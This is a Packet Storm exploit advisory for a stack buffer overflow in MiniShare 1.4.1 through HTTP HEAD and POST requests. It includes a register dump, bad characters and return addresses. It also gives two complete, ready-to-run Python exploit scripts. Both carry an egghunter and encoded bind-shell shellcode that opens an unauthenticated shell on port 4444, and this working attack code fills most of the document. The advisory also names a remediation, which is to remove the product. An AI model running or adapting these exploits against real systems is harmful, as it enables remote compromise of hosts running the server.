MiniShare 1.4.1 HEAD / POST Buffer Overflow

2018-12-07T00:00:00
ID PACKETSTORM:150689
Type packetstorm
Reporter Rafael Pedrero
Modified 2018-12-07T00:00:00

Description

                                        
                                            `Hi!!! Playing in 2006.... I have adapted the exploit to Python.  
  
The GET method is not the only one vulnerable to this stack buffer overflow (CVE-2004-2271): the HEAD and POST  
methods are also vulnerable. The difference is minimal and all three are exploited in the same way.  
The only change is a one-byte shift in the offset to the saved return address, because the method name is  
3 bytes long for GET but 4 bytes long for HEAD and POST (hence 1786 bytes of padding below instead of 1787).  
  
-------------------------------------------------------------------  
  
EAX 00000000  
ECX 77C3EF3B msvcrt.77C3EF3B  
EDX 00F14E38  
EBX 43346843  
ESP 01563908 ASCII  
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co  
HTTP/1.1  
"  
EBP 0156BB90  
ESI 00000001  
EDI 01565B68  
EIP 68433568 (little-endian "h5Ch", i.e. taken straight from the cyclic pattern: the saved return address is fully attacker-controlled)  
C 0 ES 0023 32bit 0(FFFFFFFF)  
P 1 CS 001B 32bit 0(FFFFFFFF)  
A 1 SS 0023 32bit 0(FFFFFFFF)  
Z 0 DS 0023 32bit 0(FFFFFFFF)  
S 0 FS 003B 32bit 7FFDD000(FFF)  
T 0 GS 0000 NULL  
D 0  
O 0 LastErr ERROR_SUCCESS (00000000)  
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)  
ST0 empty  
ST1 empty  
ST2 empty  
ST3 empty  
ST4 empty  
ST5 empty  
ST6 empty  
ST7 empty  
3 2 1 0 E S P U O Z D I  
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)  
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1  
  
------------------------------------------------------------------------------  
  
Only 210 bytes are available for shellcode at ESP, which is why the exploit below uses an egghunter there and carries the real payload in the Host header.  
  
------------------------------------------------------------------------------  
  
Bad characters: 0x00, 0x0d (the shellcode below is msfvenom-encoded with -b "\x00\x0d" to avoid them).  
  
------------------------------------------------------------------------------  
  
>findjmp kernel32.dll esp - XP SP 3 English (these addresses are specific to that kernel32.dll build; XP has no ASLR, but any other Windows version or language pack needs its own address)  
  
Scanning kernel32.dll for code useable with the esp register  
0x7C809F83 call esp  
0x7C8369E0 call esp  
0x7C83C2C5 push esp - ret  
0x7C87641B call esp  
  
  
<!--  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://minishare.sourceforge.net/  
# Software Link: http://minishare.sourceforge.net/  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19861  
# Category: exploit  
  
1. Description  
  
Stack-based buffer overflow in MiniShare 1.4.1 and earlier: an overly long request path in an HTTP HEAD  
request overwrites the saved return address (see EIP in the register dump above), allowing remote  
attackers to execute arbitrary code.  
  
  
2. Proof of Concept  
  
Exploit:  
  
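#!/usr/bin/env python3
import socket
import struct
import os
import sys

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via egghunter because the space for shellcode at ESP is only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
#
# Review notes:
#  * Written for Python 3: every part of the request is bytes, because
#    socket.send()/sendall() reject str.  (The original was Python 2 and lost
#    its indentation in the mailing; this is a cleaned-up copy.)
#  * RET_ADDRESS is a hard-coded "call esp" in kernel32.dll of Windows XP SP3
#    English (see the findjmp output above).  XP has no ASLR, but the address
#    differs on any other Windows build / language pack: re-run findjmp or
#    mona on the actual target and update it.
#  * The egghunter uses the int 0x2e NtAccessCheckAndAuditAlarm stub, i.e. it
#    assumes a 32-bit Windows XP-era kernel.
#  * The payload is an *unauthenticated* bind shell on TCP/4444: whoever can
#    reach that port gets a shell with MiniShare's privileges, not just you.
#  * A failed attempt (wrong offset or address) will most likely crash
#    minishare.exe, since the saved return address is overwritten regardless.
#  * Use only against systems you are authorized to test.

HOST = "127.0.0.1"
PORT = 80

# Offset to the saved return address.  GET needs 1787 bytes; HEAD and POST
# have a one-byte-longer method name, so 1786 (see the advisory text).
OFFSET = 1786
# Length of the request path the original exploit sends.
TOTAL_LEN = 2000

# Bytes the advisory lists as bad characters; msfvenom was run with -b "\x00\x0d".
BADCHARS = (b"\x00", b"\x0d")

# kernel32.dll "call esp" - WinXP SP3 English (findjmp).  Packed little-endian.
RET_ADDRESS = struct.pack("<I", 0x7C809F83)     # == b"\x83\x9f\x80\x7c"

NOPS = b"\x90" * 16

# 32-byte egghunter - Egg = r4f4 = \x72\x34\x66\x34 (looked for twice in a row).
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=4444 \
#          -b "\x00\x0d" -f c
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
# Payload size: 355 bytes
# The double egg "r4f4r4f4" is prepended so the egghunter lands right on it.
# NOTE(review): the encoded bytes do contain \x0a (line 8 below); it is not
# in the badchar list and the author reports success, so the Host header is
# presumably kept intact in the receive buffer - confirm if no shell appears.
SHELLCODE = (
    b"r4f4r4f4"
    b"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
    b"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
    b"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
    b"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
    b"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
    b"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
    b"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
    b"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
    b"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
    b"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
    b"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
    b"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
    b"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
    b"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
    b"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
    b"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
    b"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
    b"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
    b"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
    b"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
    b"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
    b"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
    b"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
    b"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c"
)


def _reject_badchars(data, label):
    """Raise ValueError if *data* contains one of BADCHARS.

    A payload carrying a bad character would be silently cut short on the
    target; failing here is cheaper than debugging a crash without a shell.
    """
    for bad in BADCHARS:
        if bad in data:
            raise ValueError("%s contains bad char %r" % (label, bad))


def build_path():
    """Return the TOTAL_LEN-byte request path that overwrites EIP.

    Layout: OFFSET bytes of padding, RET_ADDRESS (call esp), a 16-byte NOP
    sled (ESP points right after the return address, see the register dump),
    the egghunter, and 'C' filler up to TOTAL_LEN bytes.
    """
    head = b"A" * OFFSET + RET_ADDRESS + NOPS + EGGHUNTER
    if len(head) > TOTAL_LEN:
        raise ValueError("payload head (%d bytes) exceeds TOTAL_LEN" % len(head))
    path = head + b"C" * (TOTAL_LEN - len(head))
    _reject_badchars(path, "request path")
    return path


def build_request(method=b"HEAD"):
    """Return the complete HTTP request as bytes.

    The egg + shellcode travel in the Host header; the egghunter in the
    request path finds them wherever MiniShare copied them in memory.
    """
    _reject_badchars(SHELLCODE, "shellcode")
    return (method + b" " + build_path() + b" HTTP/1.1\r\n" +
            b"Host: " + SHELLCODE + b"\r\n\r\n")


def send_exploit(host, port):
    """Connect to host:port, send the request and return its length in bytes.

    Raises socket.error (OSError) on connect/send failure; the socket is
    always closed.
    """
    request = build_request()
    conn = socket.create_connection((host, port), timeout=10)
    try:
        conn.sendall(request)
    finally:
        conn.close()
    return len(request)


def main(argv=None):
    """Entry point: ``exploit.py [host] [port]`` (defaults 127.0.0.1:80).

    Returns 0 on success, 1 on a connection error.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else HOST
    port = int(args[1]) if len(args) > 1 else PORT
    print("Sending exploit...")
    try:
        sent = send_exploit(host, port)
    except socket.error as exc:
        print("Connection error: %s" % exc)
        return 1
    print("\nExploit sent, %d bytes" % sent)
    return 0


if __name__ == "__main__":
    sys.exit(main())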
  
  
  
3. Solution:  
  
No vendor fix is available: this product is deprecated. Remove MiniShare from affected hosts rather than trying to filter long requests, since the overflow is reachable through GET, HEAD and POST alike.  
  
-->  
  
  
<!--  
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.  
# Date: 05-12-2018  
# Exploit Author: Rafael Pedrero  
# Vendor Homepage: http://minishare.sourceforge.net/  
# Software Link: http://minishare.sourceforge.net/  
# Version: Minishare v1.4.1  
# Tested on: Windows  
# CVE : CVE-2018-19862  
# Category: exploit  
  
1. Description  
  
Stack-based buffer overflow in MiniShare 1.4.1 and earlier: an overly long request path in an HTTP POST  
request overwrites the saved return address (see EIP in the register dump above), allowing remote  
attackers to execute arbitrary code.  
  
  
2. Proof of Concept  
  
Exploit:  
  
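#!/usr/bin/env python3
import socket
import struct
import os
import sys

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via egghunter because the space for shellcode at ESP is only 210 bytes long.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
#
# Review notes:
#  * Written for Python 3: every part of the request is bytes, because
#    socket.send()/sendall() reject str.  (The original was Python 2 and lost
#    its indentation in the mailing; this is a cleaned-up copy.)
#  * RET_ADDRESS is a hard-coded "call esp" in kernel32.dll of Windows XP SP3
#    English (see the findjmp output above).  XP has no ASLR, but the address
#    differs on any other Windows build / language pack: re-run findjmp or
#    mona on the actual target and update it.
#  * The egghunter uses the int 0x2e NtAccessCheckAndAuditAlarm stub, i.e. it
#    assumes a 32-bit Windows XP-era kernel.
#  * The payload is an *unauthenticated* bind shell on TCP/4444: whoever can
#    reach that port gets a shell with MiniShare's privileges, not just you.
#  * A failed attempt (wrong offset or address) will most likely crash
#    minishare.exe, since the saved return address is overwritten regardless.
#  * Use only against systems you are authorized to test.

HOST = "127.0.0.1"
PORT = 80

# Offset to the saved return address.  GET needs 1787 bytes; HEAD and POST
# have a one-byte-longer method name, so 1786 (see the advisory text).
OFFSET = 1786
# Length of the request path the original exploit sends.
TOTAL_LEN = 2000

# Bytes the advisory lists as bad characters; msfvenom was run with -b "\x00\x0d".
BADCHARS = (b"\x00", b"\x0d")

# kernel32.dll "call esp" - WinXP SP3 English (findjmp).  Packed little-endian.
RET_ADDRESS = struct.pack("<I", 0x7C809F83)     # == b"\x83\x9f\x80\x7c"

NOPS = b"\x90" * 16

# 32-byte egghunter - Egg = r4f4 = \x72\x34\x66\x34 (looked for twice in a row).
EGGHUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=4444 \
#          -b "\x00\x0d" -f c
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
# Payload size: 355 bytes
# The double egg "r4f4r4f4" is prepended so the egghunter lands right on it.
# NOTE(review): the encoded bytes do contain \x0a (line 8 below); it is not
# in the badchar list and the author reports success, so the Host header is
# presumably kept intact in the receive buffer - confirm if no shell appears.
SHELLCODE = (
    b"r4f4r4f4"
    b"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
    b"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
    b"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
    b"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
    b"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
    b"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
    b"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
    b"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
    b"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
    b"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
    b"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
    b"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
    b"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
    b"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
    b"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
    b"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
    b"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
    b"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
    b"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
    b"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
    b"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
    b"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
    b"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
    b"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c"
)


def _reject_badchars(data, label):
    """Raise ValueError if *data* contains one of BADCHARS.

    A payload carrying a bad character would be silently cut short on the
    target; failing here is cheaper than debugging a crash without a shell.
    """
    for bad in BADCHARS:
        if bad in data:
            raise ValueError("%s contains bad char %r" % (label, bad))


def build_path():
    """Return the TOTAL_LEN-byte request path that overwrites EIP.

    Layout: OFFSET bytes of padding, RET_ADDRESS (call esp), a 16-byte NOP
    sled (ESP points right after the return address, see the register dump),
    the egghunter, and 'C' filler up to TOTAL_LEN bytes.
    """
    head = b"A" * OFFSET + RET_ADDRESS + NOPS + EGGHUNTER
    if len(head) > TOTAL_LEN:
        raise ValueError("payload head (%d bytes) exceeds TOTAL_LEN" % len(head))
    path = head + b"C" * (TOTAL_LEN - len(head))
    _reject_badchars(path, "request path")
    return path


def build_request(method=b"POST"):
    """Return the complete HTTP request as bytes.

    The egg + shellcode travel in the Host header; the egghunter in the
    request path finds them wherever MiniShare copied them in memory.
    """
    _reject_badchars(SHELLCODE, "shellcode")
    return (method + b" " + build_path() + b" HTTP/1.1\r\n" +
            b"Host: " + SHELLCODE + b"\r\n\r\n")


def send_exploit(host, port):
    """Connect to host:port, send the request and return its length in bytes.

    Raises socket.error (OSError) on connect/send failure; the socket is
    always closed.
    """
    request = build_request()
    conn = socket.create_connection((host, port), timeout=10)
    try:
        conn.sendall(request)
    finally:
        conn.close()
    return len(request)


def main(argv=None):
    """Entry point: ``exploit.py [host] [port]`` (defaults 127.0.0.1:80).

    Returns 0 on success, 1 on a connection error.
    """
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if args else HOST
    port = int(args[1]) if len(args) > 1 else PORT
    print("Sending exploit...")
    try:
        sent = send_exploit(host, port)
    except socket.error as exc:
        print("Connection error: %s" % exc)
        return 1
    print("\nExploit sent, %d bytes" % sent)
    return 0


if __name__ == "__main__":
    sys.exit(main())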
  
  
  
3. Solution:  
  
No vendor fix is available: this product is deprecated. Remove MiniShare from affected hosts rather than trying to filter long requests, since the overflow is reachable through GET, HEAD and POST alike.  
  
-->  
  
  
`